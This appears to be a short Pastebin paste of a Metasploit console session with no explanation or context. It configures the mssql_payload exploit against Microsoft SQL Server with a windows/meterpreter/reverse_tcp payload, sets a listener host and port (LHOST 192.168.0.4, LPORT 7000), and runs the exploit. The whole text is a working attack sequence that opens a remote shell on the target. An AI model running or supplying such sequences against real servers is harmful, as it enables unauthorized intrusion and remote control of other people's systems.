Advertisement
Guest User

Untitled

a guest
Sep 20th, 2017
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
  2. payload => windows/meterpreter/reverse_tcp
  3. msf exploit(mssql_payload) > set LHOST 192.168.0.4
  4. LHOST => 192.168.0.4
  5. msf exploit(mssql_payload) > set LPORT 7000
  6. LPORT => 7000
  7. msf exploit(mssql_payload) > exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement